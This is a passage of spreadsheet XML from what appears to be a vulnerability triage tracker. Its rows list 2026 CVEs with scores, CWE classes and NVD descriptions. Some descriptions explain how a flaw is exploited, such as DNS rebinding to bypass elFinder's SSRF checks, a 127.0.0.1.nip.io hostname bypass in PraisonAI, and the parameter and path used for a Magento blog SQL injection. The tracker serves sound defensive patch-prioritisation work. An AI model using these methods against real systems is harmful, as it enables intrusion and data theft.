      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79322</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr">
        <is>
          <t>mageplaza:mageplaza_blog</t>
        </is>
      </c>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr"/>
      <c r="Q270" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>SQL injection in the RelatedProduct block in Mageplaza Blog for Magento 2 (mageplaza/magento-2-blog-extension) through 4.3.2 allows remote unauthenticated attackers to execute arbitrary SQL commands and read arbitrary database contents via the id parameter to /mpblog/post/view.</t>
        </is>
      </c>
      <c r="S270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79322</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80214</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr"/>
      <c r="Q271" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>LibreNMS’s Virtualization Discovery module is vulnerable to command line injection. An authenticated admin user can execute arbitrary code on the host server.</t>
        </is>
      </c>
      <c r="S271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80214</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8044</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@se.com</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr"/>
      <c r="Q272" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability exists that could cause remote code execution by an attacker with a privileged account when malicious arguments are provided as backup configuration parameters.</t>
        </is>
      </c>
      <c r="S272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8044</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81889</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr"/>
      <c r="Q273" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, elFinder URL uploads in php/elFinder.class.php can bypass server-side request forgery protections when PHP cURL is unavailable because validate_address() validates $info['ip'], but get_remote_contents() selects fsock_get_contents(), which connects to $arr['host'] and performs a second DNS resolution. An attacker able to submit a URL upload can use DNS rebinding to have the first resolution return a public address and the connection resolution return a loopback or private address, causing the internal HTTP response body to be stored as an uploaded file and made readable through elFinder. After a successful fetch, get_headers($url, true) separately requests the original hostname without reusing the validated and pinned connection, creating an additional blind server-side request forgery path even when curl_get_contents() is selected. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="S273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81889</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84068</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr"/>
      <c r="Q274" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>The Quentn WP WordPress plugin before 1.2.15 does not adequately escape a request parameter before using it in an unprepared SQL query, allowing unauthenticated attackers to extract arbitrary data from the database via SQL injection.</t>
        </is>
      </c>
      <c r="S274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84068</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86762</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr"/>
      <c r="Q275" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 does not apply the CheckUserIsActivated middleware to the `api` middleware group in app/Http/Kernel.php, and deactivating a user does not revoke that user's Passport personal access tokens. As a result, although a deactivated account is correctly refused at web login, its existing API token continues to authenticate and to grant read and write access to the REST API (assets, users, licenses, etc.) at the account's prior permission level until the token expires. A deactivated account that retains user-management permissions can re-activate itself through the API, permanently defeating the deactivation control.</t>
        </is>
      </c>
      <c r="S275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86762</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86770</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr"/>
      <c r="Q276" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to validate username case sensitivity during SAML authentication, allowing attackers to authenticate as different users by registering IdP accounts with accent or case variants of victim usernames. Attackers can exploit the default utf8mb4_unicode_ci database collation to bypass username matching and achieve account takeover through federated login paths including SAML, LDAP, and OAuth.</t>
        </is>
      </c>
      <c r="S276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86770</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87633</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr"/>
      <c r="Q277" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>Use after free in Views in Google Chrome prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via UI Interaction. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87633</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12858</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>security@eset.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr"/>
      <c r="Q278" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>Improper Privilege Management vulnerability in ESET AV Remover (standalone) allows Privilege Escalation via especially crafted RPC.</t>
        </is>
      </c>
      <c r="S278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12858</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54606</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr"/>
      <c r="Q279" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>SunEditor is a lightweight and powerful WYSIWYG editor in vanilla JavaScript with no dependencies. Prior to 3.1.4, the SunEditor Embed plugin in src/plugins/modal/embed.js parses attacker-controlled raw embed HTML with DOMParser and processes the resulting DOM nodes. When an external script element follows a valid iframe, the plugin recreates a script element from the attacker-controlled src attribute and appends it to the live DOM, causing JavaScript execution in the editor page. If an application stores or reflects SunEditor content without additional backend sanitization, an attacker who can submit embed HTML can trigger stored or reflected cross-site scripting when another user opens, previews, renders, or edits the content, enabling access to page data and account actions as the victim. This issue is fixed in version 3.1.4.</t>
        </is>
      </c>
      <c r="S279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54606</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55108</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr"/>
      <c r="Q280" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-59</t>
        </is>
      </c>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>KubeVela is an open source application delivery platform. Prior to 1.9.14, from 1.10.0-alpha.1 until 1.10.9, and from 1.11.0-alpha.1 until 1.11.0-alpha.4, the Terraform remote configuration loader in pkg/controller/utils/capability.go, GetTerraformConfigurationFromRemote, clones a repository supplied through a core.oam.dev/v1beta1 ComponentDefinition and follows repository-controlled variables.tf or main.tf symlinks. A user with permission to create or update ComponentDefinition objects can point variables.tf to /dev/zero through terraform.path, after which os.Stat and os.ReadFile follow the link and read an unbounded stream before ParseTerraformVariables or HCL parsing can reject the content. The read can exhaust memory, OOM-kill the cluster-wide vela-core controller, cause repeated Pod restarts, and pressure node memory when no effective container limit is configured. This issue is fixed in versions 1.9.14, 1.10.9, and 1.11.0-alpha.4.</t>
        </is>
      </c>
      <c r="S280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55108</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55526</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr"/>
      <c r="Q281" s="5" t="inlineStr">
        <is>
          <t>CWE-350, CWE-918</t>
        </is>
      </c>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, spider_tools._host_is_blocked() does not resolve ordinary hostnames before scrape_page fetches them. A hostname such as 127.0.0.1.nip.io passes validation and resolves to loopback, permitting internal HTTP access. The fix uses socket.getaddrinfo and fails closed on DNS errors. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="S281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55526</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77974</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr"/>
      <c r="Q282" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>After spoofing the device and obtaining one user confirmation, an attacker may be able to cause the application to transmit firmware through an unauthenticated and unsigned update channel.</t>
        </is>
      </c>
      <c r="S282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77974</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87023</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr"/>
      <c r="K283" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr"/>
      <c r="Q283" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87023</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87030</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr"/>
      <c r="Q284" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87030</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-12737</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>ed10eef1-636d-4fbe-9993-6890dfa878f8</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr">
        <is>
          <t>wso2:api_control_plane, wso2:api_manager, wso2:identity_server, wso2:identity_server_as_key_manager, wso2:open_banking_am, wso2:open_banking_iam, wso2:traffic_manager, wso2:universal_gateway</t>
        </is>
      </c>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr"/>
      <c r="Q285" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>The administrative operations within the Carbon Console do not adequately validate specific user-supplied input. This oversight allows a malicious actor with administrative privileges to inject and execute arbitrary code remotely.
Successful exploitation enables a threat actor with administrative privileges and Carbon Console access to execute remote arbitrary code through specific administrative operations, leading to a complete compromise of the affected system.</t>
        </is>
      </c>
      <c r="S285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-12737</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20501</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="n">
        <v>0.001</v>
      </c>
